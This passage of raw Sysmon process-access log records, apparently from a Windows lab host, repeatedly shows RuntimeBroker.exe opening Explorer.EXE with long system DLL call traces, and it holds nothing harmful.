orage.dll+e8a72 10341000x800000000000000013073Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.836{59A5CD1D-93F9-6005-F104-00000000A301}45405968C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\Windows.Storage.dll+1418e2|C:\Windows\System32\Windows.Storage.dll+1412a3|C:\Windows\System32\Windows.Storage.dll+141129|C:\Windows\System32\Windows.Storage.dll+1095f4|C:\Windows\System32\Windows.Storage.dll+19ab5e|C:\Windows\System32\Windows.Storage.dll+107103|C:\Windows\System32\Windows.Storage.dll+106b30|C:\Windows\System32\Windows.Storage.dll+106572|C:\Windows\System32\Windows.Storage.dll+106365|C:\Windows\System32\Windows.Storage.dll+1067db|C:\Windows\System32\Windows.Storage.dll+1018ee|C:\Windows\System32\Windows.Storage.dll+1040e8|C:\Windows\System32\Windows.Storage.dll+103bcd|C:\Windows\System32\Windows.Storage.dll+102e4a|C:\Windows\System32\Windows.Storage.dll+1561fe|C:\Windows\System32\Windows.Storage.dll+155f75|C:\Windows\System32\Windows.Storage.dll+665ac|C:\Windows\System32\Windows.Storage.dll+66700|C:\Windows\System32\Windows.Storage.dll+e91e1|C:\Windows\System32\Windows.Storage.dll+e8a72 10341000x800000000000000013072Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.836{59A5CD1D-93F9-6005-F104-00000000A301}45405968C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\Windows.Storage.dll+1418c7|C:\Windows\System32\Windows.Storage.dll+1412a3|C:\Windows\System32\Windows.Storage.dll+141129|C:\Windows\System32\Windows.Storage.dll+1095f4|C:\Windows\System32\Windows.Storage.dll+19ab5e|C:\Windows\System32\Windows.Storage.dll+107103|C:\Windows\System32\Windows.Storage.dll+106b30|C:\Windows\System32\Windows.Storage.dll+106572|C:\Windows\System32\Windows.Storage.dll+106365|C:\Windows\System32\Windows.Storage.dll+1067db|C:\Windows\System32\Windows.Storage.dll+1018ee|C:\Windows\System32\Windows.Storage.dll+1040e8|C:\Windows\System32\Windows.Storage.dll+103bcd|C:\Windows\System32\Windows.Storage.dll+102e4a|C:\Windows\System32\Windows.Storage.dll+1561fe|C:\Windows\System32\Windows.Storage.dll+155f75 10341000x800000000000000013071Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.836{59A5CD1D-93F9-6005-F104-00000000A301}45405968C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\Windows.Storage.dll+1418c7|C:\Windows\System32\Windows.Storage.dll+1412a3|C:\Windows\System32\Windows.Storage.dll+141129|C:\Windows\System32\Windows.Storage.dll+1095f4|C:\Windows\System32\Windows.Storage.dll+19ab5e|C:\Windows\System32\Windows.Storage.dll+107103|C:\Windows\System32\Windows.Storage.dll+106b30|C:\Windows\System32\Windows.Storage.dll+106572|C:\Windows\System32\Windows.Storage.dll+106365|C:\Windows\System32\Windows.Storage.dll+1067db|C:\Windows\System32\Windows.Storage.dll+1018ee|C:\Windows\System32\Windows.Storage.dll+1040e8|C:\Windows\System32\Windows.Storage.dll+103bcd|C:\Windows\System32\Windows.Storage.dll+102e4a|C:\Windows\System32\Windows.Storage.dll+1561fe|C:\Windows\System32\Windows.Storage.dll+155f75|C:\Windows\System32\Windows.Storage.dll+665ac 10341000x800000000000000013070Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.836{59A5CD1D-93F9-6005-F104-00000000A301}45405968C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\Windows.Storage.dll+141977|C:\Windows\System32\Windows.Storage.dll+1412a3|C:\Windows\System32\Windows.Storage.dll+141129|C:\Windows\System32\Windows.Storage.dll+19cd9a|C:\Windows\System32\Windows.Storage.dll+10a787|C:\Windows\System32\Windows.Storage.dll+19ab19|C:\Windows\System32\Windows.Storage.dll+107103|C:\Windows\System32\Windows.Storage.dll+106b30|C:\Windows\System32\Windows.Storage.dll+106572|C:\Windows\System32\Windows.Storage.dll+106365|C:\Windows\System32\Windows.Storage.dll+1067db|C:\Windows\System32\Windows.Storage.dll+1018ee|C:\Windows\System32\Windows.Storage.dll+1040e8|C:\Windows\System32\Windows.Storage.dll+103bcd|C:\Windows\System32\Windows.Storage.dll+102e4a|C:\Windows\System32\Windows.Storage.dll+1561fe|C:\Windows\System32\Windows.Storage.dll+155f75|C:\Windows\System32\Windows.Storage.dll+665ac|C:\Windows\System32\Windows.Storage.dll+66700|C:\Windows\System32\Windows.Storage.dll+e91e1 10341000x800000000000000013069Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.836{59A5CD1D-93F9-6005-F104-00000000A301}45405968C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\Windows.Storage.dll+1418e2|C:\Windows\System32\Windows.Storage.dll+1412a3|C:\Windows\System32\Windows.Storage.dll+141129|C:\Windows\System32\Windows.Storage.dll+19cd9a|C:\Windows\System32\Windows.Storage.dll+10a787|C:\Windows\System32\Windows.Storage.dll+19ab19|C:\Windows\System32\Windows.Storage.dll+107103|C:\Windows\System32\Windows.Storage.dll+106b30|C:\Windows\System32\Windows.Storage.dll+106572|C:\Windows\System32\Windows.Storage.dll+106365|C:\Windows\System32\Windows.Storage.dll+1067db|C:\Windows\System32\Windows.Storage.dll+1018ee|C:\Windows\System32\Windows.Storage.dll+1040e8|C:\Windows\System32\Windows.Storage.dll+103bcd|C:\Windows\System32\Windows.Storage.dll+102e4a|C:\Windows\System32\Windows.Storage.dll+1561fe|C:\Windows\System32\Windows.Storage.dll+155f75|C:\Windows\System32\Windows.Storage.dll+665ac|C:\Windows\System32\Windows.Storage.dll+66700|C:\Windows\System32\Windows.Storage.dll+e91e1 10341000x800000000000000013068Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.836{59A5CD1D-93F9-6005-F104-00000000A301}45405968C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\Windows.Storage.dll+1418c7|C:\Windows\System32\Windows.Storage.dll+1412a3|C:\Windows\System32\Windows.Storage.dll+141129|C:\Windows\System32\Windows.Storage.dll+19cd9a|C:\Windows\System32\Windows.Storage.dll+10a787|C:\Windows\System32\Windows.Storage.dll+19ab19|C:\Windows\System32\Windows.Storage.dll+107103|C:\Windows\System32\Windows.Storage.dll+106b30|C:\Windows\System32\Windows.Storage.dll+106572|C:\Windows\System32\Windows.Storage.dll+106365|C:\Windows\System32\Windows.Storage.dll+1067db|C:\Windows\System32\Windows.Storage.dll+1018ee|C:\Windows\System32\Windows.Storage.dll+1040e8|C:\Windows\System32\Windows.Storage.dll+103bcd|C:\Windows\System32\Windows.Storage.dll+102e4a|C:\Windows\System32\Windows.Storage.dll+1561fe 10341000x800000000000000013067Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.836{59A5CD1D-93F9-6005-F104-00000000A301}45405968C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\Windows.Storage.dll+1418c7|C:\Windows\System32\Windows.Storage.dll+1412a3|C:\Windows\System32\Windows.Storage.dll+141129|C:\Windows\System32\Windows.Storage.dll+19cd9a|C:\Windows\System32\Windows.Storage.dll+10a787|C:\Windows\System32\Windows.Storage.dll+19ab19|C:\Windows\System32\Windows.Storage.dll+107103|C:\Windows\System32\Windows.Storage.dll+106b30|C:\Windows\System32\Windows.Storage.dll+106572|C:\Windows\System32\Windows.Storage.dll+106365|C:\Windows\System32\Windows.Storage.dll+1067db|C:\Windows\System32\Windows.Storage.dll+1018ee|C:\Windows\System32\Windows.Storage.dll+1040e8|C:\Windows\System32\Windows.Storage.dll+103bcd|C:\Windows\System32\Windows.Storage.dll+102e4a|C:\Windows\System32\Windows.Storage.dll+1561fe|C:\Windows\System32\Windows.Storage.dll+155f75 10341000x800000000000000013066Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.836{59A5CD1D-93F9-6005-F104-00000000A301}45405968C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\Windows.Storage.dll+141977|C:\Windows\System32\Windows.Storage.dll+140f51|C:\Windows\System32\Windows.Storage.dll+140e7c|C:\Windows\System32\Windows.Storage.dll+10423b|C:\Windows\System32\Windows.Storage.dll+10671b|C:\Windows\System32\Windows.Storage.dll+1018ee|C:\Windows\System32\Windows.Storage.dll+1040e8|C:\Windows\System32\Windows.Storage.dll+103bcd|C:\Windows\System32\Windows.Storage.dll+102e4a|C:\Windows\System32\Windows.Storage.dll+1561fe|C:\Windows\System32\Windows.Storage.dll+155f75|C:\Windows\System32\Windows.Storage.dll+665ac|C:\Windows\System32\Windows.Storage.dll+66700|C:\Windows\System32\Windows.Storage.dll+e91e1|C:\Windows\System32\Windows.Storage.dll+e8a72|C:\Windows\System32\Windows.Storage.dll+e6459|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013065Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.836{59A5CD1D-93F9-6005-F104-00000000A301}45405968C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\Windows.Storage.dll+1418e2|C:\Windows\System32\Windows.Storage.dll+140f51|C:\Windows\System32\Windows.Storage.dll+140e7c|C:\Windows\System32\Windows.Storage.dll+10423b|C:\Windows\System32\Windows.Storage.dll+10671b|C:\Windows\System32\Windows.Storage.dll+1018ee|C:\Windows\System32\Windows.Storage.dll+1040e8|C:\Windows\System32\Windows.Storage.dll+103bcd|C:\Windows\System32\Windows.Storage.dll+102e4a|C:\Windows\System32\Windows.Storage.dll+1561fe|C:\Windows\System32\Windows.Storage.dll+155f75|C:\Windows\System32\Windows.Storage.dll+665ac|C:\Windows\System32\Windows.Storage.dll+66700|C:\Windows\System32\Windows.Storage.dll+e91e1|C:\Windows\System32\Windows.Storage.dll+e8a72|C:\Windows\System32\Windows.Storage.dll+e6459|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013064Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.836{59A5CD1D-93F9-6005-F104-00000000A301}45405968C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\Windows.Storage.dll+1418c7|C:\Windows\System32\Windows.Storage.dll+140f51|C:\Windows\System32\Windows.Storage.dll+140e7c|C:\Windows\System32\Windows.Storage.dll+10423b|C:\Windows\System32\Windows.Storage.dll+10671b|C:\Windows\System32\Windows.Storage.dll+1018ee|C:\Windows\System32\Windows.Storage.dll+1040e8|C:\Windows\System32\Windows.Storage.dll+103bcd|C:\Windows\System32\Windows.Storage.dll+102e4a|C:\Windows\System32\Windows.Storage.dll+1561fe|C:\Windows\System32\Windows.Storage.dll+155f75|C:\Windows\System32\Windows.Storage.dll+665ac|C:\Windows\System32\Windows.Storage.dll+66700|C:\Windows\System32\Windows.Storage.dll+e91e1|C:\Windows\System32\Windows.Storage.dll+e8a72|C:\Windows\System32\Windows.Storage.dll+e6459 10341000x800000000000000013063Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.836{59A5CD1D-93F9-6005-F104-00000000A301}45405968C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\Windows.Storage.dll+1418c7|C:\Windows\System32\Windows.Storage.dll+140f51|C:\Windows\System32\Windows.Storage.dll+140e7c|C:\Windows\System32\Windows.Storage.dll+10423b|C:\Windows\System32\Windows.Storage.dll+10671b|C:\Windows\System32\Windows.Storage.dll+1018ee|C:\Windows\System32\Windows.Storage.dll+1040e8|C:\Windows\System32\Windows.Storage.dll+103bcd|C:\Windows\System32\Windows.Storage.dll+102e4a|C:\Windows\System32\Windows.Storage.dll+1561fe|C:\Windows\System32\Windows.Storage.dll+155f75|C:\Windows\System32\Windows.Storage.dll+665ac|C:\Windows\System32\Windows.Storage.dll+66700|C:\Windows\System32\Windows.Storage.dll+e91e1|C:\Windows\System32\Windows.Storage.dll+e8a72|C:\Windows\System32\Windows.Storage.dll+e6459|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x800000000000000013062Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.836{59A5CD1D-93F9-6005-F104-00000000A301}45405968C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\Windows.Storage.dll+141977|C:\Windows\System32\Windows.Storage.dll+140f51|C:\Windows\System32\Windows.Storage.dll+140e7c|C:\Windows\System32\Windows.Storage.dll+10423b|C:\Windows\System32\Windows.Storage.dll+1041d1|C:\Windows\System32\Windows.Storage.dll+1040a4|C:\Windows\System32\Windows.Storage.dll+103bcd|C:\Windows\System32\Windows.Storage.dll+102e4a|C:\Windows\System32\Windows.Storage.dll+1561fe|C:\Windows\System32\Windows.Storage.dll+155f75|C:\Windows\System32\Windows.Storage.dll+665ac|C:\Windows\System32\Windows.Storage.dll+66700|C:\Windows\System32\Windows.Storage.dll+e91e1|C:\Windows\System32\Windows.Storage.dll+e8a72|C:\Windows\System32\Windows.Storage.dll+e6459|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013061Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.836{59A5CD1D-93F9-6005-F104-00000000A301}45405968C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\Windows.Storage.dll+1418e2|C:\Windows\System32\Windows.Storage.dll+140f51|C:\Windows\System32\Windows.Storage.dll+140e7c|C:\Windows\System32\Windows.Storage.dll+10423b|C:\Windows\System32\Windows.Storage.dll+1041d1|C:\Windows\System32\Windows.Storage.dll+1040a4|C:\Windows\System32\Windows.Storage.dll+103bcd|C:\Windows\System32\Windows.Storage.dll+102e4a|C:\Windows\System32\Windows.Storage.dll+1561fe|C:\Windows\System32\Windows.Storage.dll+155f75|C:\Windows\System32\Windows.Storage.dll+665ac|C:\Windows\System32\Windows.Storage.dll+66700|C:\Windows\System32\Windows.Storage.dll+e91e1|C:\Windows\System32\Windows.Storage.dll+e8a72|C:\Windows\System32\Windows.Storage.dll+e6459|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013060Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.836{59A5CD1D-93F9-6005-F104-00000000A301}45405968C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\Windows.Storage.dll+1418c7|C:\Windows\System32\Windows.Storage.dll+140f51|C:\Windows\System32\Windows.Storage.dll+140e7c|C:\Windows\System32\Windows.Storage.dll+10423b|C:\Windows\System32\Windows.Storage.dll+1041d1|C:\Windows\System32\Windows.Storage.dll+1040a4|C:\Windows\System32\Windows.Storage.dll+103bcd|C:\Windows\System32\Windows.Storage.dll+102e4a|C:\Windows\System32\Windows.Storage.dll+1561fe|C:\Windows\System32\Windows.Storage.dll+155f75|C:\Windows\System32\Windows.Storage.dll+665ac|C:\Windows\System32\Windows.Storage.dll+66700|C:\Windows\System32\Windows.Storage.dll+e91e1|C:\Windows\System32\Windows.Storage.dll+e8a72|C:\Windows\System32\Windows.Storage.dll+e6459|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x800000000000000013059Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.836{59A5CD1D-93F9-6005-F104-00000000A301}45405968C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\Windows.Storage.dll+1418c7|C:\Windows\System32\Windows.Storage.dll+140f51|C:\Windows\System32\Windows.Storage.dll+140e7c|C:\Windows\System32\Windows.Storage.dll+10423b|C:\Windows\System32\Windows.Storage.dll+1041d1|C:\Windows\System32\Windows.Storage.dll+1040a4|C:\Windows\System32\Windows.Storage.dll+103bcd|C:\Windows\System32\Windows.Storage.dll+102e4a|C:\Windows\System32\Windows.Storage.dll+1561fe|C:\Windows\System32\Windows.Storage.dll+155f75|C:\Windows\System32\Windows.Storage.dll+665ac|C:\Windows\System32\Windows.Storage.dll+66700|C:\Windows\System32\Windows.Storage.dll+e91e1|C:\Windows\System32\Windows.Storage.dll+e8a72|C:\Windows\System32\Windows.Storage.dll+e6459|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013058Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.836{59A5CD1D-93F9-6005-F104-00000000A301}45405968C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\Windows.Storage.dll+141977|C:\Windows\System32\Windows.Storage.dll+140f51|C:\Windows\System32\Windows.Storage.dll+140e7c|C:\Windows\System32\Windows.Storage.dll+10423b|C:\Windows\System32\Windows.Storage.dll+1041d1|C:\Windows\System32\Windows.Storage.dll+104083|C:\Windows\System32\Windows.Storage.dll+103bcd|C:\Windows\System32\Windows.Storage.dll+102e4a|C:\Windows\System32\Windows.Storage.dll+1561fe|C:\Windows\System32\Windows.Storage.dll+155f75|C:\Windows\System32\Windows.Storage.dll+665ac|C:\Windows\System32\Windows.Storage.dll+66700|C:\Windows\System32\Windows.Storage.dll+e91e1|C:\Windows\System32\Windows.Storage.dll+e8a72|C:\Windows\System32\Windows.Storage.dll+e6459|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013057Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.836{59A5CD1D-93F9-6005-F104-00000000A301}45405968C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\Windows.Storage.dll+1418e2|C:\Windows\System32\Windows.Storage.dll+140f51|C:\Windows\System32\Windows.Storage.dll+140e7c|C:\Windows\System32\Windows.Storage.dll+10423b|C:\Windows\System32\Windows.Storage.dll+1041d1|C:\Windows\System32\Windows.Storage.dll+104083|C:\Windows\System32\Windows.Storage.dll+103bcd|C:\Windows\System32\Windows.Storage.dll+102e4a|C:\Windows\System32\Windows.Storage.dll+1561fe|C:\Windows\System32\Windows.Storage.dll+155f75|C:\Windows\System32\Windows.Storage.dll+665ac|C:\Windows\System32\Windows.Storage.dll+66700|C:\Windows\System32\Windows.Storage.dll+e91e1|C:\Windows\System32\Windows.Storage.dll+e8a72|C:\Windows\System32\Windows.Storage.dll+e6459|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013056Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.836{59A5CD1D-93F9-6005-F104-00000000A301}45405968C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\Windows.Storage.dll+1418c7|C:\Windows\System32\Windows.Storage.dll+140f51|C:\Windows\System32\Windows.Storage.dll+140e7c|C:\Windows\System32\Windows.Storage.dll+10423b|C:\Windows\System32\Windows.Storage.dll+1041d1|C:\Windows\System32\Windows.Storage.dll+104083|C:\Windows\System32\Windows.Storage.dll+103bcd|C:\Windows\System32\Windows.Storage.dll+102e4a|C:\Windows\System32\Windows.Storage.dll+1561fe|C:\Windows\System32\Windows.Storage.dll+155f75|C:\Windows\System32\Windows.Storage.dll+665ac|C:\Windows\System32\Windows.Storage.dll+66700|C:\Windows\System32\Windows.Storage.dll+e91e1|C:\Windows\System32\Windows.Storage.dll+e8a72|C:\Windows\System32\Windows.Storage.dll+e6459|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x800000000000000013055Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.836{59A5CD1D-93F9-6005-F104-00000000A301}45405968C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\Windows.Storage.dll+1418c7|C:\Windows\System32\Windows.Storage.dll+140f51|C:\Windows\System32\Windows.Storage.dll+140e7c|C:\Windows\System32\Windows.Storage.dll+10423b|C:\Windows\System32\Windows.Storage.dll+1041d1|C:\Windows\System32\Windows.Storage.dll+104083|C:\Windows\System32\Windows.Storage.dll+103bcd|C:\Windows\System32\Windows.Storage.dll+102e4a|C:\Windows\System32\Windows.Storage.dll+1561fe|C:\Windows\System32\Windows.Storage.dll+155f75|C:\Windows\System32\Windows.Storage.dll+665ac|C:\Windows\System32\Windows.Storage.dll+66700|C:\Windows\System32\Windows.Storage.dll+e91e1|C:\Windows\System32\Windows.Storage.dll+e8a72|C:\Windows\System32\Windows.Storage.dll+e6459|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013054Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.836{59A5CD1D-93F9-6005-F104-00000000A301}45405968C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\System32\Windows.Storage.dll+170f46|C:\Windows\System32\Windows.Storage.dll+1411fc|C:\Windows\System32\Windows.Storage.dll+140e39|C:\Windows\System32\Windows.Storage.dll+10423b|C:\Windows\System32\Windows.Storage.dll+1041d1|C:\Windows\System32\Windows.Storage.dll+104083|C:\Windows\System32\Windows.Storage.dll+103bcd|C:\Windows\System32\Windows.Storage.dll+102e4a|C:\Windows\System32\Windows.Storage.dll+1561fe|C:\Windows\System32\Windows.Storage.dll+155f75|C:\Windows\System32\Windows.Storage.dll+665ac|C:\Windows\System32\Windows.Storage.dll+66700|C:\Windows\System32\Windows.Storage.dll+e91e1|C:\Windows\System32\Windows.Storage.dll+e8a72|C:\Windows\System32\Windows.Storage.dll+e6459|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013053Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 